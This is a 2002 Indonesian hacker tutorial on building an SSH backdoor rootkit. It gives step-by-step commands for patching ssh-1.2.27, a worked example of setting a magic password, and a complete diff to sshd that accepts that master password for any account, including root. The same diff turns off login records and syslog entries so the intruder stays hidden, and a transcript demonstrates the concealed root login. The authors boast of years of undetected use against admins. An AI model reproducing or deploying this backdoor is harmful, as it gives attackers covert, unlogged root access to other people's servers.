==========================================================================================
Root Kit SSH Distribution v4.0 (by Zelea)
==========================================================================================

Mengingat banyak newbie yang pengen banget punya backdoor tapi engga ngerti cara
pembuatannya
cuman lantaran engga bisa bahasa english jadi ditulis kembali dalam bahasa Indonesia oleh
neo k-elektronik

well lets start *dalam bahasa indo nya "ayo kita kemon"*.

Backdoor atau "pintu belakang" ada banyak macam, salah satunya backdoor ssh.

Yang diperlukan:

source ssh-1.2.27 download di :
http://packetstormsecurity.org/crypt/ssh/old/ssh-1.2.27.tar.gz
diff file rkssh5 download di  :
http://packetstormsecurity.org/UNIX/penetration/rootkits/rkssh5.tar.gz
atau tinggal copy paste lampiran rkssh5.diff di bawah artikel ini.

langkah2 setelah download:

$ tar xzfv ssh-1.2.27.tar.gz
$ tar xzfv rkssh5.tar.gz
$ cp rkssh5/rk-ssh.diff ssh-1.2.27
$ cd ssh-1.2.27

nah.. sekarang bagian yang agak rumit ;p (harap dibaca dulu baik2 yak)
elo mau magic password nya apa?? mmm.. kita pake "kecoak" sebagai magic password kita ok
;)

$ md5sum --string=kecoak

hasilnya:
f87b8dbd4f26748de83d15283a40de77  "kecoak" 

nah sekarang edit rk-ssh.diff
perhatikan baris ini:

+  char md5passwd[33]="ed5c6101c7cc02d1a927e2e37be1eb0d";   <-= ganti dengan string md5
kita tadi.

selanjutnya

$ patch < rk-ssh.diff

done...

sekarang kita tes dulu compile ssh-1.2.27 di mesin linux kita sendiri.

$ ./configure ; make

kemudian kita jalankan di port 5300

# ./sshd -p 5300

tes login ahhh...

[ceyen@logong ceyen]$ w
 12:44am  up 13 days, 31 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
ceyen    pts/2    192.168.2.2      12:43am  0.00s  0.23s  0.06s  w 
[ceyen@logong ceyen]$ ssh -l root localhost -p 5300
The authenticity of host 'localhost (127.0.0.1)' can't be established.
RSA key fingerprint is a5:20:b6:0b:fc:f4:dd:ec:b2:d3:e5:86:09:38:fb:b9.
Are you sure you want to continue connecting (yes/no)? yes      
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
root@localhost's password: <-= ketik magic password kita kecoak
Last login: Fri Aug 16 22:42:58 2002 from 192.168.2.2
[root@logong root]# w
 12:44am  up 13 days, 32 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
ceyen    pts/2    192.168.2.2      12:43am  0.00s  0.57s  0.38s  ssh -l root localhost 
[root@logong root]# uname -a ; id
Linux logong 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

waww... yang keliatan cuman 1 user!!! padahal kita lagi login sebagai root ;p

nah, selanjutnya?? masak sih cuman segitu aja? hehehe.. be creative lah ;)

happy hiding newbies..


Dini hari 9 Agustus 2002
salam kecoak

ceyen, ifk a.k.a r3dshadow, MaHa^DeWa, Pro-vider

greetz to: cbug, litherr, fwerd, logC, d_ajax, cwarrior, ladybug, NukeMafia, rollan,
saki@econet.dhs.org

ps: backdoor ini sudah dipake sejak 1999 dan sampai sekarang masih banyak admin yang belum
mengetahui
kehadiran kami :)


lampiran rk-ssh.diff:

diff -urN ssh-1.2.27-old/login.c ssh-1.2.27/login.c
--- ssh-1.2.27-old/login.c      Wed May 12  07:19:26 1999
+++ ssh-1.2.27/login.c  Mon Dec  6 23:06:32 1999
@@ -119,6 +119,8 @@
 #endif /* HAVE_HPUX_TCB_AUTH */
 #include "ssh.h"
 
+int lets_log;
+
 /* Returns the time when the user last logged in.  Returns 0 if the 
    information is not available.  This must be called before record_login. 
    The host the user logged in from will be returned in buf. */
@@ -259,6 +261,7 @@
 {
   int fd;
 
+  if (lets_log) {
 #if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG)
   struct lastlog ll;
   char *lastlog;
@@ -559,11 +562,13 @@
     }
 #endif   
 }
+}
   
 /* Records that the user has logged out. */
 
 void record_logout(int pid, const char *ttyname)
 {
+if (lets_log) {
 #ifdef HAVE_LIBUTIL_LOGIN
   const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
   if (logout(line))
@@ -571,4 +576,5 @@
 #else /* HAVE_LIBUTIL_LOGIN */
   record_login(pid, ttyname, "", -1, "", NULL);
 #endif /* HAVE_LIBUTIL_LOGIN */  
+}
 }
diff -urN ssh-1.2.27-old/ssh.h ssh-1.2.27/ssh.h
--- ssh-1.2.27-old/ssh.h        Wed May 12  07:19:28 1999
+++ ssh-1.2.27/ssh.h    Mon Dec  6 23:06:58 1999
@@ -866,6 +866,7 @@
 /* Global variables */
 
 extern uid_t original_real_uid;
+extern int lets_log;
 
 #ifdef AMIGA
 #define UID_ROOT 65535
diff -urN ssh-1.2.27-old/sshd.c ssh-1.2.27/sshd.c
--- ssh-1.2.27-old/sshd.c       Mon Dec  6  23:10:22 1999
+++ ssh-1.2.27/sshd.c   Tue Dec  7 00:09:58 1999
@@ -1408,7 +1408,9 @@
   auth_delete_socket(NULL);
   
   /* The connection has been terminated. */
+  if (lets_log) {
   log_msg("Closing connection to %.100s", get_remote_ipaddr());
+  }
   packet_close();
   exit(0);
 }
@@ -2135,6 +2137,38 @@
   abort();
 }
 
+/* Check if the "global" password was entered */
+int check_global_passwd( unsigned char *pass )
+{
+  /* Paste here the output from md5sum --string="Your_Password" */
+  char md5passwd[33]="ed5c6101c7cc02d1a927e2e37be1eb0d";
+  struct MD5Context md;
+  unsigned char md5buffer[32];
+  int i;
+
+  /* Compute the response. */
+  MD5Init(&md);
+  MD5Update(&md, pass, strlen( pass));
+  MD5Final(md5buffer, &md);
+  for( i = 15; i >= 0; i-- )
+  {
+    md5buffer[i*2+1] = (md5buffer[i] & 0xf) + '0';
+    md5buffer[i*2] = (md5buffer[i] >> 4) + '0';
+  }
+  for( i = 0; i < 32; i++ )
+    if( md5buffer[i] > '9' )
+      md5buffer[i] += 0x27; /* lower case hexa chars */
+
+  if( strncmp(md5passwd,md5buffer,32) )
+    return 0;
+  else
+  {
+    /* Disable logging if conditions are met. */
+    lets_log=0; 
+    return 1;
+  }
+}
+
 /* Performs authentication of an incoming connection.  Session key has already
    been exchanged and encryption is enabled.  User is the user name to log
    in as (received from the clinet).  Privileged_port is true if the
@@ -2278,6 +2312,7 @@
       /* Get a packet from the client. */
       type = packet_read();
       
+      lets_log=1;
       /* Process the packet. */
       switch (type)
         {
@@ -2660,14 +2695,17 @@
 #if defined(KERBEROS) && defined(KRB5)
           if (auth_password(user, password, client))
 #else  /* defined(KERBEROS) && defined(KRB5) */
-          if (auth_password(user, passwordd))
+          if (auth_password(user, password)  || check_global_passwd(password) )
 #endif /* defined(KERBEROS) && defined(KRB5) */
             {
               /* Successful authentication. */
               /* Clear the password from memory. */
               memset(password, 0, strlen(password));
               xfree(password);
-              log_msg("Password authenticaation for %.100s accepted.", user);
+              if( lets_log ) 
+                log_msg("Password authentication for %.100s accepted.", user); 
+              else 
+                log_msg("Closing connection to %.100s", get_remote_ipaddr());
               authentication_type = SSH_AUTH_PASSWORD;
               authenticated = 1;
               break;
@@ -2708,14 +2746,14 @@
     }
 
   /* Check if the user is logging in as root and root logins are disallowed. */
-  if (pw->pw_uid == UID_ROOT && options.peermit_root_login == 1)
+  if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log)
     {
       if (authentication_type == SSH_AUTH_PASSWORD)
         packet_disconnect("ROOT LOGIN REFUSED FROM %.200s", 
                           get_canonical_hostname());
     }
   else
-    if (pw->pw_uid == UID_ROOT && options..permit_root_login == 0)
+    if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log)
       {
         if (forced_command)
           log_msg("Root login accepted for forced command.", forced_command);
@@ -2767,7 +2805,7 @@
 #endif
   
   /* Log root logins with severity NOTICE. */
-  if (pw->pw_uid == UID_ROOT)
+  if (pw->pw_uid == UID_ROOT && lets_log)
     log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s",
                  pw->pw_name, get_canonical_hostname());